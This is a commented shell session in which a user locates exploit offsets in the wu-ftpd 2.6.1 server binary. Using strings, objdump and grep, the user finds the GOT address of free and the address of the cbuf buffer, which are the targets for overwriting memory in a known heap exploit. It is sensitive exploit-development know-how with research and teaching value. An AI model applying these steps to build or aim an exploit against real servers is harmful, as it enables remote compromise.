1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
|
## get the version string
[dvorak@redhat get-offset]$ strings in.ftpd | grep ^Version
Version wu-2.6.1-16
## get the GOT address of free
[dvorak@redhat get-offset]$ objdump --dynamic-reloc in.ftpd > dynrel
[dvorak@redhat get-offset]$ grep free dynrel
0807314c R_386_JUMP_SLOT free
0807319c R_386_JUMP_SLOT globfree64
## get cbuf
[dvorak@redhat get-offset]$ objdump --disassemble in.ftpd > disass
objdump: in.ftpd: no symbols
[dvorak@redhat get-offset]$ objdump -T in.ftpd > dynsym
## first get address of strncasecmp
[dvorak@redhat get-offset]$ grep strncasecmp dynsym
0804acd8 DF *UND* 00000065 GLIBC_2.0 strncasecmp
## look for calls with 3rd argument 0xa
[dvorak@redhat get-offset]$ grep 804acd8 -B3 disass | grep '\$0xa'
805a788: 6a 0a push $0xa
## see what is used as first argument (cbuf) to strncasecmp
[dvorak@redhat get-offset]$ grep -A3 '^ 805a788' disass
805a788: 6a 0a push $0xa
805a78a: 68 43 d7 06 08 push $0x806d743
805a78f: 53 push %ebx
805a790: e8 43 05 ff ff call 0x804acd8
## its, ebx, see where ebx gets set
[dvorak@redhat get-offset]$ grep -B100 '^ 805a788' disass | grep ebx
805a68a: bb e0 5d 08 08 mov $0x8085de0,%ebx
805a6b0: 43 inc %ebx
805a6b1: 0f b6 13 movzbl (%ebx),%edx
805a6de: 89 df mov %ebx,%edi
805a6fa: bb 04 00 00 00 mov $0x4,%ebx
805a704: 89 1d e0 64 07 08 mov %ebx,0x80764e0
### EUREKA last place where ebx is set .. so cbuf is at .. 0x8085de0
805a70a: bb e0 5d 08 08 mov $0x8085de0,%ebx
805a712: 0f b6 14 1e movzbl (%esi,%ebx,1),%edx
805a719: c6 04 1e 00 movb $0x0,(%esi,%ebx,1)
805a71d: 53 push %ebx
805a72d: 53 push %ebx
805a752: 53 push %ebx
805a772: 53 push %ebx
## that's all folks
|
